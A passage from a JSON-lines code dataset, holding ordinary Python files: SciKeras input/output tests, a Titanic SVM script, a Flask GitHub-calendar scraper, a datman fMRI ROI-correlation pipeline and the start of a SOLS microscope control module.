params\n n_features_in_ = meta[\"n_features_in_\"]\n\n inp = Input((n_features_in_,))\n\n x1 = Dense(100)(inp)\n\n out = [Dense(1, activation=\"sigmoid\")(x1) for _ in range(meta[\"n_outputs_\"])]\n\n model = Model([inp], out)\n losses = \"binary_crossentropy\"\n model.compile(optimizer=\"adam\", loss=losses, metrics=[\"accuracy\"])\n\n return model\n\n clf_keras = MultiOutputClassifier(model=get_model)\n clf_sklearn = RandomForestClassifier()\n\n # generate data\n X = np.random.rand(10, 4)\n y1 = np.random.randint(0, 2, size=(10, 1))\n y2 = np.random.randint(0, 2, size=(10, 1))\n y = np.hstack([y1, y2])\n\n clf_keras.fit(X, y)\n y_wrapper = clf_keras.predict(X)\n clf_keras.score(X, y)\n\n clf_sklearn.fit(X, y)\n y_sklearn = clf_sklearn.predict(X)\n\n assert y_sklearn.shape == y_wrapper.shape\n\n\ndef test_multi_label_clasification():\n \"\"\"Compares to scikit-learn RandomForestClassifier classifier.\n \"\"\"\n clf_keras = FunctionalAPIMultiLabelClassifier()\n clf_sklearn = RandomForestClassifier()\n # taken from https://scikit-learn.org/stable/modules/multiclass.html\n y = [[2, 3, 4], [2], [0, 1, 3], [0, 1, 2, 3, 4], [0, 1, 2]]\n y = MultiLabelBinarizer().fit_transform(y)\n\n (x_train, _), (_, _) = get_test_data(\n train_samples=y.shape[0], test_samples=0, input_shape=(4,), num_classes=3,\n )\n\n clf_keras.fit(x_train, y)\n y_pred_keras = clf_keras.predict(x_train)\n clf_keras.score(x_train, y)\n\n clf_sklearn.fit(x_train, y)\n y_pred_sklearn = clf_sklearn.predict(x_train)\n clf_sklearn.score(x_train, y)\n\n assert y_pred_keras.shape == y_pred_sklearn.shape\n\n\ndef test_multi_output_regression():\n \"\"\"Compares to scikit-learn RandomForestRegressor.\n \"\"\"\n reg_keras = FunctionalAPIMultiOutputRegressor()\n reg_sklearn = RandomForestRegressor()\n # taken from https://scikit-learn.org/stable/modules/multiclass.html\n (X, _), (_, _) = get_test_data(\n train_samples=TRAIN_SAMPLES,\n test_samples=TEST_SAMPLES,\n input_shape=(INPUT_DIM,),\n num_classes=NUM_CLASSES,\n )\n y = np.random.random_sample(size=(TRAIN_SAMPLES, NUM_CLASSES))\n\n reg_keras.fit(X, y)\n y_pred_keras = reg_keras.predict(X)\n reg_keras.score(X, y)\n\n reg_sklearn.fit(X, y)\n y_pred_sklearn = reg_sklearn.predict(X)\n reg_sklearn.score(X, y)\n\n assert y_pred_keras.shape == y_pred_sklearn.shape\n\n\n@pytest.mark.parametrize(\n \"y, y_type\",\n [\n (np.array([1, 2, 
3]), \"multiclass\"), # ordinal, numeric, sorted\n (np.array([2, 1, 3]), \"multiclass\"), # ordinal, numeric, sorted\n (\n np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]),\n \"multilabel-indicator\",\n ), # one-hot encoded\n (np.array([\"a\", \"b\", \"c\"]), \"multiclass\"), # categorical\n ],\n)\ndef test_KerasClassifier_loss_invariance(y, y_type):\n \"\"\"Test that KerasClassifier can use both\n categorical_crossentropy and sparse_categorical_crossentropy\n with either one-hot encoded targets or sparse targets.\n \"\"\"\n X = np.arange(0, y.shape[0]).reshape(-1, 1)\n clf_1 = KerasClassifier(\n model=dynamic_classifier,\n hidden_layer_sizes=(100,),\n loss=\"categorical_crossentropy\",\n random_state=0,\n )\n clf_1.fit(X, y)\n clf_1.partial_fit(X, y)\n y_1 = clf_1.predict(X)\n if y_type != \"multilabel-indicator\":\n # sparse_categorical_crossentropy is not compatible with\n # one-hot encoded targets, and one-hot encoded targets are not used in sklearn\n # This is a use case that does not natively succeed in Keras or skelarn estimators\n # and thus SciKeras does not intend to auto-convert data to support it\n clf_2 = KerasClassifier(\n model=dynamic_classifier,\n hidden_layer_sizes=(100,),\n loss=\"sparse_categorical_crossentropy\",\n random_state=0,\n )\n clf_2.fit(X, y)\n y_2 = clf_1.predict(X)\n\n np.testing.assert_equal(y_1, y_2)\n\n\n@pytest.mark.parametrize(\n \"y, y_type\",\n [\n (np.array([1, 2, 3]), \"multiclass\"), # ordinal, numeric, sorted\n (np.array([2, 1, 3]), \"multiclass\"), # ordinal, numeric, sorted\n (\n np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1]]),\n \"multilabel-indicator\",\n ), # one-hot encoded\n (np.array([\"a\", \"b\", \"c\"]), \"multiclass\"), # categorical\n ],\n)\n@pytest.mark.parametrize(\n \"loss\", [\"categorical_crossentropy\", \"sparse_categorical_crossentropy\"]\n)\ndef test_KerasClassifier_transformers_can_be_reused(y, y_type, loss):\n \"\"\"Test that KerasClassifier can use both\n categorical_crossentropy and sparse_categorical_crossentropy\n with either one-hot encoded targets or sparse targets.\n \"\"\"\n if y_type == \"multilabel-indicator\" and loss == \"sparse_categorical_crossentropy\":\n return # not compatible, see test_KerasClassifier_loss_invariance\n X1, y1 = np.array([[1, 2, 3]]).T, np.array([1, 2, 3])\n clf = KerasClassifier(\n model=dynamic_classifier, hidden_layer_sizes=(100,), loss=loss, random_state=0,\n )\n clf.fit(X1, y1)\n tfs = clf.target_encoder_\n X2, y2 = X1, np.array([1, 1, 1]) # only 1 out or 3 classes\n clf.partial_fit(X2, y2)\n tfs_new = clf.target_encoder_\n assert tfs_new is tfs # same transformer was re-used\n assert set(clf.classes_) == set(y1)\n\n\ndef test_incompatible_output_dimensions():\n \"\"\"Compares to the scikit-learn RandomForestRegressor classifier.\n \"\"\"\n # create dataset with 4 outputs\n X = np.random.rand(10, 20)\n y = np.random.randint(low=0, high=3, size=(10,))\n\n # create a model with 2 outputs\n def build_fn_clf(meta: Dict[str, Any], compile_kwargs: Dict[str, Any],) -> Model:\n # get params\n n_features_in_ = meta[\"n_features_in_\"]\n\n inp = Input((n_features_in_,))\n\n x1 = Dense(100)(inp)\n\n binary_out = Dense(1, activation=\"sigmoid\")(x1)\n cat_out = Dense(2, activation=\"softmax\")(x1)\n\n model = Model([inp], [binary_out, cat_out])\n model.compile(loss=[\"binary_crossentropy\", \"categorical_crossentropy\"])\n\n return model\n\n clf = KerasClassifier(model=build_fn_clf)\n\n with pytest.raises(ValueError, match=\"input of size\"):\n clf.fit(X, y)\n\n\n@pytest.mark.parametrize(\n \"dtype\", 
[\"float32\", \"float64\", \"int64\", \"int32\", \"uint8\", \"uint16\", \"object\"],\n)\ndef test_classifier_handles_dtypes(dtype):\n \"\"\"Tests that classifiers correctly handle dtype conversions and\n return the same dtype as the inputs.\n \"\"\"\n n, d = 20, 3\n n_classes = 3\n X = np.random.uniform(size=(n, d)).astype(dtype)\n y = np.random.choice(n_classes, size=n).astype(dtype)\n sample_weight = np.ones(y.shape).astype(dtype)\n\n class StrictClassifier(KerasClassifier):\n def _fit_keras_model(\n self, X, y, sample_weight, warm_start, epochs, initial_epoch\n ):\n if dtype == \"object\":\n assert X.dtype == np.dtype(tf.keras.backend.floatx())\n else:\n assert X.dtype == np.dtype(dtype)\n # y is passed through encoders, it is likely not the original dtype\n # sample_weight should always be floatx\n assert sample_weight.dtype == np.dtype(tf.keras.backend.floatx())\n return super()._fit_keras_model(\n X, y, sample_weight, warm_start, epochs, initial_epoch\n )\n\n clf = StrictClassifier(model=dynamic_classifier, model__hidden_layer_sizes=(100,))\n clf.fit(X, y, sample_weight=sample_weight)\n assert clf.score(X, y) >= 0\n if y.dtype.kind != \"O\":\n assert clf.predict(X).dtype == np.dtype(dtype)\n else:\n assert clf.predict(X).dtype == np.float32\n\n\n@pytest.mark.parametrize(\n \"dtype\", [\"float32\", \"float64\", \"int64\", \"int32\", \"uint8\", \"uint16\", \"object\"],\n)\ndef test_regressor_handles_dtypes(dtype):\n \"\"\"Tests that regressors correctly handle dtype conversions and\n always return float dtypes.\n \"\"\"\n n, d = 20, 3\n X = np.random.uniform(size=(n, d)).astype(dtype)\n y = np.random.uniform(size=n).astype(dtype)\n sample_weight = np.ones(y.shape).astype(dtype)\n\n class StrictRegressor(KerasRegressor):\n def _fit_keras_model(\n self, X, y, sample_weight, warm_start, epochs, initial_epoch\n ):\n if dtype == \"object\":\n assert X.dtype == np.dtype(tf.keras.backend.floatx())\n assert y.dtype == np.dtype(tf.keras.backend.floatx())\n else:\n assert X.dtype == np.dtype(dtype)\n assert y.dtype == np.dtype(dtype)\n # sample_weight should always be floatx\n assert sample_weight.dtype == np.dtype(tf.keras.backend.floatx())\n return super()._fit_keras_model(\n X, y, sample_weight, warm_start, epochs, initial_epoch\n )\n\n reg = StrictRegressor(model=dynamic_regressor, model__hidden_layer_sizes=(100,))\n reg.fit(X, y, sample_weight=sample_weight)\n y_hat = reg.predict(X)\n if y.dtype.kind == \"f\":\n assert y_hat.dtype == np.dtype(dtype)\n else:\n assert y_hat.dtype.kind == \"f\"\n\n\n@pytest.mark.parametrize(\"X_dtype\", [\"float32\", \"int64\"])\n@pytest.mark.parametrize(\"y_dtype,\", [\"float32\", \"float64\", \"uint8\", \"int16\", \"object\"])\n@pytest.mark.parametrize(\"run_eagerly\", [True, False])\ndef test_mixed_dtypes(y_dtype, X_dtype, run_eagerly):\n n, d = 20, 3\n n_classes = 3\n X = np.random.uniform(size=(n, d)).astype(X_dtype)\n y = np.random.choice(n_classes, size=n).astype(y_dtype)\n\n class StrictRegressor(KerasRegressor):\n def _fit_keras_model(\n self, X, y, sample_weight, warm_start, epochs, initial_epoch\n ):\n if X_dtype == \"object\":\n assert X.dtype == np.dtype(tf.keras.backend.floatx())\n else:\n assert X.dtype == np.dtype(X_dtype)\n if y_dtype == \"object\":\n assert y.dtype == np.dtype(tf.keras.backend.floatx())\n else:\n assert y.dtype == np.dtype(y_dtype)\n return super()._fit_keras_model(\n X, y, sample_weight, warm_start, epochs, initial_epoch\n )\n\n reg = StrictRegressor(\n model=dynamic_regressor,\n run_eagerly=run_eagerly,\n 
reg.fit(X, y)\n y_hat = reg.predict(X)\n if y.dtype.kind == \"f\":\n assert y_hat.dtype == np.dtype(y_dtype)\n else:\n assert y_hat.dtype.kind == \"f\"\n\n\ndef test_single_output_multilabel_indicator():\n \"\"\"Tests that a multilabel-indicator\n target can be used without errors.\n \"\"\"\n X = np.random.random(size=(100, 2))\n y = np.random.randint(0, 1, size=(100, 3))\n y[0, :] = 1 # i.e. not \"one hot encoded\"\n\n def build_fn():\n model = Sequential()\n model.add(Dense(10, input_shape=(2,), activation=\"relu\"))\n model.add(Dense(3, activation=\"sigmoid\"))\n return model\n\n clf = KerasClassifier(model=build_fn, loss=\"categorical_crossentropy\",)\n # check that there are no errors\n clf.fit(X, y)\n clf.predict(X)\n # check the target type\n assert clf.target_type_ == \"multilabel-indicator\"\n # check classes\n np.testing.assert_equal(clf.classes_, np.arange(3))\n","sub_path":"tests/test_input_outputs.py","file_name":"test_input_outputs.py","file_ext":"py","file_size_in_byte":14773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"49012524","text":"import random\nimport pandas as pd\nimport numpy as np\nimport pygame\nfrom sklearn.preprocessing import LabelEncoder, StandardScaler # label encoding\nfrom sklearn.model_selection import cross_val_score, RandomizedSearchCV, train_test_split # k-fold cross-validation\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import accuracy_score\ntrain_data = pd.read_csv('titanic_train.csv')\ntest_data = pd.read_csv('titanic_test.csv')\n# Data analysis\n# print(test_data.info())  # training-set info\n\ntrain_data['Age'].fillna(train_data['Age'].mean(), inplace=True)\ntrain_data['Fare'].fillna(train_data['Fare'].mean(), inplace=True)\ntrain_data['Embarked'].fillna('S', inplace=True)\n# Data cleaning done; proceed to feature extraction\nfeature = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare', 'Embarked']\ntrain_feature = train_data[feature]\ntrain_survived = train_data['Survived']\n\n# Inspect the feature info and process it\n# print(train_feature.info())  # view feature info\nencoder = LabelEncoder()\n
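# (Note: LabelEncoder maps each category to an integer, e.g. female/male -> 0/1;\n# fine for the binary 'Sex' column, while for 'Embarked' the integers impose an\n# arbitrary order that one-hot encoding would avoid for an SVM.)\n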
train_feature['Sex'] = encoder.fit_transform(train_feature['Sex'])\ntrain_feature['Embarked'] = encoder.fit_transform(train_feature['Embarked'])\n# print(train_feature.info())  # view the modified feature info\n\n\n\n# Normalization\nscaler = StandardScaler()\ntrain_feature.astype(float)\nX_train_scaled = scaler.fit_transform(train_feature)  # standardize to zero mean\nfeature_train, feature_test, survived_train, survived_test = train_test_split(X_train_scaled, train_survived, test_size=0.3, random_state=0)  # split into training and test sets\nclassifier = SVC(C=2, kernel='rbf', gamma=10, decision_function_shape='ovo')\nclassifier.fit(feature_train,survived_train)\ntra_label = classifier.predict(feature_train)  # predicted labels for the training set\ntes_label = classifier.predict(feature_test)  # predicted labels for the test set\nprint(\"Training set:\", accuracy_score(survived_train, tra_label))\nprint(\"Test set:\", accuracy_score(survived_test, tes_label))","sub_path":"课程资料/机器学习/第三次/组/曹鹏霄/titanic_svm_cpx.py","file_name":"titanic_svm_cpx.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"231030924","text":"import requests\nfrom flask import Flask, render_template, jsonify\nfrom bs4 import BeautifulSoup\n\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef index():\n return app.send_static_file('index.html')\n\n\n@app.route(\"/<user_name>\")\ndef user(user_name):\n soup = BeautifulSoup(requests.get('https://github.com/' + user_name).content, \"html.parser\")\n svg = soup.find('svg', {\"class\": \"js-calendar-graph-svg\"})\n firstg = svg.findChildren()[0]\n weeksg = firstg.find_all('g')\n result = []\n for weekg in weeksg:\n daysg = weekg.find_all('rect')\n week = []\n for dayrect in daysg:\n week.append({'data_count': int(dayrect['data-count']), 'data_date': dayrect['data-date']})\n result.append({'blocks': week})\n\n return jsonify(result)\n\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"flask/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"}
+{"seq_id":"188204618","text":"#!/usr/bin/env python\n\"\"\"\nThis extracts the mean time series from the defined ROIs in MNI space (6 mm\nspheres). 
This data is returned as the time series & a full correlation matrix,\nin .csv format).\n\nUsage:\n dm_proc_rest.py [options] \n\nArguments:\n study name defined in master configuration .yml file\n\nOptions:\n --subject SUBJID Subject ID to run\n --debug Debug logging\n\nDETAILS\n\n 1) Produces a CSV of the ROI time series from the MNI-space atlas NIFTI in assets/.\n 2) Produces a correlation matrix of these same time series.\n\"\"\"\n\nfrom datman.docopt import docopt\nimport datman.utils as utils\nimport datman.config as cfg\nimport logging\nimport glob\nimport numpy as np\nimport os, sys\nimport time\nimport yaml\n\nlogging.basicConfig(level=logging.WARN, format=\"[%(name)s] %(levelname)s: %(message)s\")\nlogger = logging.getLogger(os.path.basename(__file__))\n\nNODE = os.uname()[1]\n\ndef get_inputs(config, path, exp, scanid):\n \"\"\"\n Finds the epitome exports matching the connectivity tag specified in the\n settings file\n \"\"\"\n inputs = []\n\n # get target epitome exports\n target_filetypes = config.study_config['fmri'][exp]['conn']\n if type(target_filetypes) == str:\n target_filetypes = [target_filetypes]\n\n # find the matching pre-processed output files\n candidates = glob.glob('{}/{}_*.nii.gz'.format(path, scanid))\n for filetype in target_filetypes:\n inputs.extend(filter(lambda x: filetype + '.nii.gz' in x, candidates))\n\n # remove GLM outputs\n inputs = filter(lambda x: '_glm_' not in x, inputs)\n\n return inputs\n\ndef run_analysis(scanid, config, study):\n \"\"\"\n Extracts: time series, correlation matricies using defined atlas.\n \"\"\"\n study_base = config.get_study_base(study)\n fmri_dir = os.path.join(study_base, config.site_config['paths']['fmri'])\n experiments = config.study_config['fmri'].keys()\n atlas = os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, 'assets/shen_2mm_268_parcellation.nii.gz')\n\n if not os.path.isfile(atlas):\n print('ERROR: atlas file {} not found'.format(atlas))\n sys.exit(1)\n\n for exp in experiments:\n path = os.path.join(fmri_dir, exp, scanid)\n\n # get filetypes to analyze, ignoring ROI files\n inputs = get_inputs(config, path, exp, scanid)\n\n for filename in inputs:\n basename = os.path.basename(utils.splitext(filename)[0])\n\n # if the final correlation matrix exists, skip processing\n if os.path.isfile(os.path.join(path, basename + '_roi-corrs.csv')):\n continue\n\n # generate ROI file in register with subject's data\n roi_file = os.path.join(path, basename + '_rois.nii.gz')\n if not os.path.isfile(roi_file):\n rtn, out = utils.run('3dresample -master {} -prefix {} -inset {}'.format(filename, roi_file, atlas))\n if rtn:\n logger.error('{}\\n{}'.format(out, NODE))\n raise Exception('Error resampling atlas {} to match {}.'.format(atlas, filename))\n else:\n pass\n\n rois, _, _, _ = utils.loadnii(roi_file)\n data, _, _, _ = utils.loadnii(filename)\n\n n_rois = len(np.unique(rois[rois > 0]))\n dims = np.shape(data)\n\n # loop through all ROIs, extracting mean timeseries.\n output = np.zeros((n_rois, dims[1]))\n\n for i, roi in enumerate(np.unique(rois[rois > 0])):\n idx = np.where(rois == roi)[0]\n\n if len(idx) > 0:\n output[i, :] = np.mean(data[idx, :], axis=0)\n\n # save the raw time series\n np.savetxt(os.path.join(path, basename + '_roi-timeseries.csv'), output, delimiter=',')\n\n # save the full correlation matrix\n corrs = np.corrcoef(output)\n np.savetxt(os.path.join(path, basename + '_roi-corrs.csv'), corrs, delimiter=',')\n\ndef main():\n\n arguments = docopt(__doc__)\n study = arguments['']\n scanid 
= arguments['--subject']\n debug = arguments['--debug']\n\n logging.info('Starting')\n if debug:\n logger.setLevel(logging.DEBUG)\n\n # load config for study\n try:\n config = cfg.config(study=study)\n except ValueError:\n logger.error('study {} not defined in master configuration file\\n{}'.format(study, NODE))\n sys.exit(1)\n\n study_base = config.get_study_base(study)\n\n if 'fmri' not in config.site_config['paths']:\n logger.error(\"paths:fmri not defined in site configuration file\\n{}\".format(NODE))\n sys.exit(1)\n\n fmri_dir = os.path.join(study_base, config.site_config['paths']['fmri'])\n\n if scanid:\n path = os.path.join(fmri_dir, scanid)\n try:\n run_analysis(scanid, config, study)\n except Exception as e:\n logger.error(e)\n sys.exit(1)\n\n # run in batch mode\n else:\n # look for subjects with at least one fmri type missing outputs\n subjects = []\n\n # loop through fmri experiments defined\n for exp in config.study_config['fmri'].keys():\n expected_files = config.study_config['fmri'][exp]['conn']\n fmri_dirs = glob.glob('{}/*'.format(os.path.join(fmri_dir, exp)))\n\n for subj_dir in fmri_dirs:\n candidates = glob.glob('{}/*'.format(subj_dir))\n for filetype in expected_files:\n # add subject if outputs don't already exist\n # (use any() here: in Python 3 a filter object is always truthy)\n if not any('{}_roi-corrs.csv'.format(filetype) in x for x in candidates):\n subjects.append(os.path.basename(subj_dir))\n break\n\n # collapse found subjects (do not double-count) and create a list of commands\n commands = []\n subjects = list(set(subjects))\n for subject in subjects:\n commands.append(\" \".join([__file__, study, '--subject {}'.format(subject)]))\n\n if commands:\n logger.debug('queueing up the following commands:\\n'+'\\n'.join(commands))\n\n for i, cmd in enumerate(commands):\n jobname = 'dm_rest_{}_{}'.format(i, time.strftime(\"%Y%m%d-%H%M%S\"))\n jobfile = '/tmp/{}'.format(jobname)\n logfile = '/tmp/{}.log'.format(jobname)\n errfile = '/tmp/{}.err'.format(jobname)\n with open(jobfile, 'w') as fid:\n fid.write('#!/bin/bash\\n')\n fid.write(cmd)\n\n rtn, out = utils.run('qsub -V -q main.q -o {} -e {} -N {} {}'.format(\n logfile, errfile, jobname, jobfile))\n if rtn:\n logger.error(\"Job submission failed. Output follows. 
{}\".format(NODE))\n logger.error(\"stdout: {}\".format(out))\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"bin/dm_proc_rest.py","file_name":"dm_proc_rest.py","file_ext":"py","file_size_in_byte":6949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"646928783","text":"# Imports from the python standard library:\r\nimport time\r\nimport os\r\nfrom datetime import datetime\r\nimport atexit\r\nimport queue\r\n\r\n# Third party imports, installable via pip:\r\nimport numpy as np\r\nfrom scipy.ndimage import zoom, rotate, gaussian_filter1d\r\nfrom tifffile import imread, imwrite\r\n\r\n# Our code, one .py file per module, copy files to your local directory:\r\ntry:\r\n import pco_edge42_cl # github.com/amsikking/pco_edge42_cl\r\n import ni_PCIe_6738 # github.com/amsikking/ni_PCIe_6738\r\n import sutter_Lambda_10_3 # github.com/amsikking/sutter_Lambda_10_3\r\n import pi_C_867_2U2 # github.com/amsikking/pi_C_867_2U2\r\n import pi_E_709_1C1L # github.com/amsikking/pi_E_709_1C1L\r\n import thorlabs_MDT694B # github.com/amsikking/thorlabs_MDT694B\r\n import concurrency_tools as ct # github.com/AndrewGYork/tools\r\n from napari_in_subprocess import display # github.com/AndrewGYork/tools\r\nexcept Exception as e:\r\n print('sols_microscope.py -> One or more imports failed')\r\n print('sols_microscope.py -> error =',e)\r\n\r\n# SOLS optical configuration (edit as needed):\r\nM1 = 200 / 5; Mscan = 100 / 100; M2 = 10 / 300; M3 = 200 / 9\r\nMRR = M1 * Mscan * M2; Mtot = MRR * M3;\r\ncamera_px_um = 6.5; sample_px_um = camera_px_um / Mtot\r\ntilt = np.deg2rad(50)\r\n\r\nclass Microscope:\r\n def __init__(self,\r\n max_allocated_bytes, # Limit of available RAM for machine\r\n ao_rate, # slow ~1e3, medium ~1e4, fast ~1e5\r\n name='SOLS v1.1',\r\n verbose=True):\r\n self.name = name\r\n self.verbose = verbose\r\n if self.verbose: print(\"%s: opening...\"%self.name)\r\n self.unfinished_tasks = queue.Queue()\r\n slow_fw_init = ct.ResultThread(\r\n target=self._init_filter_wheel).start() #~5.3s\r\n slow_camera_init = ct.ResultThread(\r\n target=self._init_camera).start() #~3.6s\r\n slow_snoutfocus_init = ct.ResultThread(\r\n target=self._init_snoutfocus).start() #1s\r\n slow_focus_init = ct.ResultThread(\r\n target=self._init_focus_piezo).start() #~0.6s\r\n slow_stage_init = ct.ResultThread(\r\n target=self._init_XY_stage).start() #~0.4s\r\n self._init_display() #~1.3s\r\n self._init_datapreview() #~0.8s\r\n self._init_ao(ao_rate) #~0.2s\r\n slow_stage_init.get_result()\r\n slow_focus_init.get_result()\r\n slow_snoutfocus_init.get_result()\r\n slow_camera_init.get_result()\r\n slow_fw_init.get_result()\r\n self.max_allocated_bytes = max_allocated_bytes\r\n self.illumination_sources = ( # configure as needed\r\n 'LED', '405', '488', '561', '640', '405_on_during_rolling') \r\n self.max_bytes_per_buffer = (2**31) # legal tiff\r\n self.max_data_buffers = 4 # camera, preview, display, filesave\r\n self.max_preview_buffers = self.max_data_buffers\r\n self.preview_line_px = 10 # line thickness for previews\r\n # The pco_edge42_cl has unreliable pixel rows at the top and bottom,\r\n # so for clean previews it's best to remove them:\r\n self.preview_crop_px = 3 # crop top and bottom pixel rows for previews\r\n self.num_active_data_buffers = 0\r\n self.num_active_preview_buffers = 0\r\n self.timestamp_mode = \"binary+ASCII\"\r\n self.camera._set_timestamp_mode(self.timestamp_mode) # default on\r\n self._settings_applied = False\r\n if 
self.verbose: print(\"\\n%s: -> open and ready.\"%self.name)\r\n\r\n def _init_ao(self, ao_rate):\r\n self.names_to_voltage_channels = {\r\n '405_TTL': 0,\r\n '405_power': 1,\r\n '445_TTL': 2,\r\n '445_power': 3, \r\n '488_TTL': 4,\r\n '488_power': 5,\r\n '561_TTL': 6,\r\n '561_power': 7,\r\n '640_TTL': 8,\r\n '640_power': 9,\r\n 'LED_power': 10,\r\n 'camera': 11,\r\n 'galvo': 12,\r\n 'snoutfocus_piezo': 13,\r\n 'snoutfocus_shutter': 14,\r\n 'LSx_BFP': 16,\r\n 'LSy_BFP': 17,\r\n 'LSx_IMG': 18,\r\n 'LSy_IMG': 19,}\r\n if self.verbose: print(\"\\n%s: opening ao card...\"%self.name)\r\n self.ao = ni_PCIe_6738.DAQ(\r\n num_channels=20, rate=ao_rate, verbose=False)\r\n if self.verbose: print(\"\\n%s: -> ao card open.\"%self.name)\r\n atexit.register(self.ao.close)\r\n\r\n def _init_filter_wheel(self):\r\n if self.verbose: print(\"\\n%s: opening filter wheel...\"%self.name)\r\n self.filter_wheel = sutter_Lambda_10_3.Controller(\r\n which_port='COM7', verbose=False)\r\n if self.verbose: print(\"\\n%s: -> filter wheel open.\"%self.name) \r\n self.filter_wheel_position = 0\r\n atexit.register(self.filter_wheel.close)\r\n\r\n def _init_camera(self):\r\n if self.verbose: print(\"\\n%s: opening camera...\"%self.name)\r\n self.camera = ct.ObjectInSubprocess(\r\n pco_edge42_cl.Camera, verbose=False, close_method_name='close')\r\n if self.verbose: print(\"\\n%s: -> camera open.\"%self.name)\r\n\r\n def _init_snoutfocus(self):\r\n if self.verbose: print(\"\\n%s: opening snoutfocus piezo...\"%self.name)\r\n self.snoutfocus_controller = thorlabs_MDT694B.Controller(\r\n which_port='COM4', verbose=False)\r\n if self.verbose: print(\"\\n%s: -> snoutfocus piezo open.\"%self.name) \r\n atexit.register(self.snoutfocus_controller.close)\r\n\r\n def _init_focus_piezo(self):\r\n if self.verbose: print(\"\\n%s: opening focus piezo...\"%self.name)\r\n self.focus_piezo = pi_E_709_1C1L.Controller(\r\n which_port='COM3', z_min_um=0, z_max_um=800, verbose=False)\r\n if self.verbose: print(\"\\n%s: -> focus piezo open.\"%self.name)\r\n atexit.register(self.focus_piezo.close)\r\n\r\n def _init_XY_stage(self):\r\n if self.verbose: print(\"\\n%s: opening XY stage...\"%self.name) \r\n self.XY_stage = pi_C_867_2U2.Controller(\r\n which_port='COM6', verbose=False)\r\n if self.verbose: print(\"\\n%s: -> XY stage open.\"%self.name)\r\n atexit.register(self.XY_stage.close)\r\n\r\n def _init_datapreview(self):\r\n if self.verbose: print(\"\\n%s: opening datapreview...\"%self.name) \r\n self.datapreview = ct.ObjectInSubprocess(DataPreview)\r\n if self.verbose: print(\"\\n%s: -> datapreview open.\"%self.name) \r\n\r\n def _init_display(self):\r\n if self.verbose: print(\"\\n%s: opening display...\"%self.name) \r\n self.display = display()\r\n if self.verbose: print(\"\\n%s: -> display open.\"%self.name) \r\n\r\n def _check_memory(self): \r\n memory_exceeded = False\r\n # Data:\r\n self.images = (self.volumes_per_buffer *\r\n len(self.channels_per_slice) *\r\n self.slices_per_volume)\r\n self.bytes_per_data_buffer = (\r\n 2 * self.images * self.height_px * self.width_px)\r\n if self.bytes_per_data_buffer > self.max_bytes_per_buffer:\r\n print(\"\\n%s: ***WARNING*** -> settings rejected\"%self.name +\r\n \" (bytes_per_data_buffer > max)\")\r\n print(\"%s: -> reduce settings\"%self.name +\r\n \" or increase 'max_bytes_per_buffer'\")\r\n memory_exceeded = True\r\n # Preview:\r\n preview_shape = DataPreview.shape(self.volumes_per_buffer,\r\n self.slices_per_volume,\r\n len(self.channels_per_slice),\r\n self.height_px,\r\n 
self.width_px,\r\n self.scan_step_size_px,\r\n self.preview_line_px,\r\n self.preview_crop_px,\r\n self.timestamp_mode)\r\n self.bytes_per_preview_buffer = 2 * int(np.prod(preview_shape))\r\n if self.bytes_per_preview_buffer > self.max_bytes_per_buffer:\r\n print(\"\\n%s: ***WARNING*** -> settings rejected\"%self.name +\r\n \" (bytes_per_preview_buffer > max)\")\r\n print(\"%s: -> reduce settings\"%self.name +\r\n \" or increase 'max_bytes_per_buffer'\")\r\n memory_exceeded = True\r\n # Total:\r\n self.total_bytes = (\r\n self.bytes_per_data_buffer * self.max_data_buffers +\r\n self.bytes_per_preview_buffer * self.max_preview_buffers)\r\n if self.total_bytes > self.max_allocated_bytes:\r\n print(\"\\n%s: ***WARNING*** -> settings rejected\"%self.name +\r\n \" (total_bytes > max)\")\r\n print(\"%s: -> reduce settings\"%self.name +\r\n \" or increase 'max_allocated_bytes'\")\r\n memory_exceeded = True\r\n return memory_exceeded\r\n\r\n def _calculate_voltages(self):\r\n n2c = self.names_to_voltage_channels # nickname\r\n # Timing information:\r\n exposure_px = self.ao.s2p(1e-6 * self.camera.exposure_us)\r\n rolling_px = self.ao.s2p(1e-6 * self.camera.rolling_time_us)\r\n jitter_px = max(self.ao.s2p(30e-6), 1)\r\n period_px = max(exposure_px, rolling_px) + jitter_px\r\n # Galvo voltages:\r\n galvo_volts_per_um = -1.146 / 100 # calibrated using graticule\r\n galvo_scan_volts = galvo_volts_per_um * self.scan_range_um\r\n galvo_voltages = np.linspace(\r\n - galvo_scan_volts/2, galvo_scan_volts/2, self.slices_per_volume)\r\n # Calculate voltages:\r\n voltages = []\r\n for volumes in range(self.volumes_per_buffer):\r\n # TODO: either bidirectional volumes, or smoother galvo flyback\r\n for _slice in range(self.slices_per_volume):\r\n for channel, power in zip(self.channels_per_slice,\r\n self.power_per_channel):\r\n v = np.zeros((period_px, self.ao.num_channels), 'float64')\r\n v[:rolling_px, n2c['camera']] = 5 # falling edge-> light on!\r\n v[:, n2c['galvo']] = galvo_voltages[_slice]\r\n light_on_px = rolling_px\r\n if channel in ('405_on_during_rolling',): light_on_px = 0\r\n if channel != 'LED': # i.e. 
